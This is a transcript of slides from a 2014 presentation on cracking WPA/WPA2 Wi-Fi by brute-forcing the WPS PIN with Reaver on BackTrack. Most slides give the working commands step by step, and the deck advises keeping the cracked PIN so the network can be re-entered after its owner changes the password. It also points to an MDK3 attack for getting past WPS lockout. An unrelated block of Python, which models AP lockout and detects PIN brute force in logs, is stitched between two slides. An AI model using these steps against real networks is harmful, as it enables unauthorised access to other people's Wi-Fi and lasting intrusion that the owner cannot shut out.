cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Presenter: Bidhan Ghimire, 23rd December 2014

Transcript of cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Page 1: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Presenter: Bidhan Ghimire

23rd December 2014

Page 2: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

WPA (Wi-Fi Protected Access) is a security standard introduced in 2003. It makes the network more secure than WEP does.

WPS (Wi-Fi Protected Setup): accessing a WPA/WPA2 network normally requires the PSK (pre-shared key). The WPS PIN allows a user to connect to the network even without knowing the security key (PSK). The WPS PIN is an 8-digit PIN printed on the sticker of the router. The WPS PIN of a network can be found by a brute-force attack if WPS is "NOT LOCKED". Once we know the WPS PIN, we can get the PSK for a lifetime, no matter how many times the PSK is changed.

Encryption in wi-fi

Page 3: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

ISO file of BackTrack 5 R3

VMware (optional)

External Wi-Fi receiver (as per requirement)

Tools for cracking WPA/WPA2

Page 4: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

An operating system based on the Ubuntu/Linux distribution, aimed at penetration-testing use.

The current version of BackTrack is BackTrack 5 Revision 3, shortened as BT5R3.

Backtrack

Page 5: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Boot into BackTrack using any method (live CD, VMware, ISO file on your computer).

BEFORE STARTING THE ATTACK...

Page 6: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type startx

Page 7: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type iwconfig

Gather information about your Wi-Fi adapter

Page 8: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type airmon-ng start wlan0

Enable the monitor mode

Page 9: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type wash -i interface (mon0 here)

Search the network you want to crack

Page 10: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type airodump-ng mon0

Alternatively,

Page 11: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

From the list of access points, note the BSSID and the channel of the network you want to crack.

Page 12: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

reaver -i mon0 -b A1:B2:C3:D4:E5 (BSSID of the network) -c (channel of the network) -vv

Run the Reaver attack

Page 13: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Keep quiet until Reaver gives you the WPS PIN and PSK of the target AP.

KEEP QUIET FOR 3 TO 8 HOURS

Page 14: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Note the WPS PIN, PSK and BSSID of the network you cracked.

You can use them to recover the PSK if the owner changes the PSK later.

After the attack

Page 15: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Type reaver -i mon0 -b BSSID -c channel --pin=(PIN you noted after cracking) -vv

Recovering the PSK (if changed)

Page 16: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

SOME OF THE NEWEST ROUTERS COME WITH A SPECIAL FEATURE THAT LOCKS WPS AUTOMATICALLY AFTER 10 WRONG PIN ENTRIES.

IN THAT CASE YOU MIGHT SEE "AP RATE LIMITING".

WPS LOCKED
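The two conditions the slides contrast, an AP that is "NOT LOCKED" (slide 2) and one that locks WPS after 10 wrong PIN entries and reports "AP rate limiting" (slide 16), can be modelled from the access point's side. The following is an added example and is not code from the presentation, from Reaver or from any router firmware; the class and function names, the 10-failure threshold, the lock duration and the log-line format are my own assumptions. It shows how many PIN guesses an AP actually evaluates with and without a lockout, and how an AP log can be scanned for the failure pattern a PIN brute force leaves behind.

```python
"""WPS PIN lockout, modelled from the access point's side (added example)."""
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class WpsLockout:
    """Per-AP WPS PIN attempt counter with a simple lockout (assumed model)."""
    max_failures: Optional[int] = 10   # assumed: None means the AP never locks
    lock_seconds: float = 60.0         # assumed lock duration after a lockout
    failures: int = 0
    locked_until: float = 0.0
    events: List[Tuple[float, str]] = field(default_factory=list)

    def is_locked(self, now: float) -> bool:
        return now < self.locked_until

    def attempt(self, now: float, pin_correct: bool) -> str:
        """Handle one PIN attempt at time `now`.

        Returns "locked" (attempt dropped, PIN not evaluated), "ok" or "fail".
        """
        if self.is_locked(now):
            return "locked"
        if pin_correct:
            self.failures = 0
            return "ok"
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            # This is the state Reaver reports as "AP rate limiting".
            self.locked_until = now + self.lock_seconds
            self.failures = 0
            self.events.append((now, "AP rate limiting"))
        return "fail"


def evaluated_guesses(policy: WpsLockout, guesses: int,
                      interval: float = 1.0) -> Tuple[int, int]:
    """Feed `guesses` wrong PINs, one every `interval` seconds.

    Returns (evaluated, rejected): how many guesses the AP actually checked
    against its PIN and how many it dropped while locked.
    """
    evaluated = rejected = 0
    for i in range(guesses):
        if policy.attempt(now=i * interval, pin_correct=False) == "locked":
            rejected += 1
        else:
            evaluated += 1
    return evaluated, rejected


# Constructed AP log lines in an assumed format (not real hostapd output):
# "<time> wps-pin-fail|wps-pin-ok sta=<station MAC>"
SAMPLE_LOG = """\
100 wps-pin-fail sta=02:00:00:00:00:aa
101 wps-pin-fail sta=02:00:00:00:00:aa
101 wps-pin-fail sta=02:00:00:00:00:bb
102 wps-pin-fail sta=02:00:00:00:00:aa
103 wps-pin-fail sta=02:00:00:00:00:aa
104 wps-pin-fail sta=02:00:00:00:00:aa
105 wps-pin-ok sta=02:00:00:00:00:cc
""".splitlines()


def suspicious_stations(log_lines, threshold: int = 5) -> List[str]:
    """Return station MACs with at least `threshold` failed PIN attempts.

    A legitimate user mistypes a PIN once or twice; a sustained stream of
    failures from one station is the pattern a PIN brute force leaves behind.
    """
    fails = Counter()
    for line in log_lines:
        parts = line.split()
        if len(parts) == 3 and parts[1] == "wps-pin-fail":
            fails[parts[2].split("=", 1)[1]] += 1
    return sorted(mac for mac, n in fails.items() if n >= threshold)


if __name__ == "__main__":
    never_locks = WpsLockout(max_failures=None)
    locks = WpsLockout(max_failures=10, lock_seconds=60.0)
    print("unlocked AP:", evaluated_guesses(never_locks, 1000))  # (1000, 0)
    print("locking AP :", evaluated_guesses(locks, 1000))        # (150, 850)
    print("lock events:", len(locks.events))                     # 15
    print("suspicious :", suspicious_stations(SAMPLE_LOG))
```

With the assumed settings the locking AP evaluates 10 guesses and then drops the next 59, so over 1000 guesses at one per second it checks only 150 of them; the unlocked AP checks all 1000. The lockout is what turns the hours-long brute force on slide 13 into something far slower, which is why the slides treat a locked AP as a separate problem.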

Page 17: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

Page 18: cracking WPA/WPA2 encrypted Wi-fi network using backtrack

The WPS locked condition can be solved to some extent by an MDK3 attack.

Solution to "WPS LOCKED"

Page 19: cracking WPA/WPA2 encrypted Wi-fi network using backtrack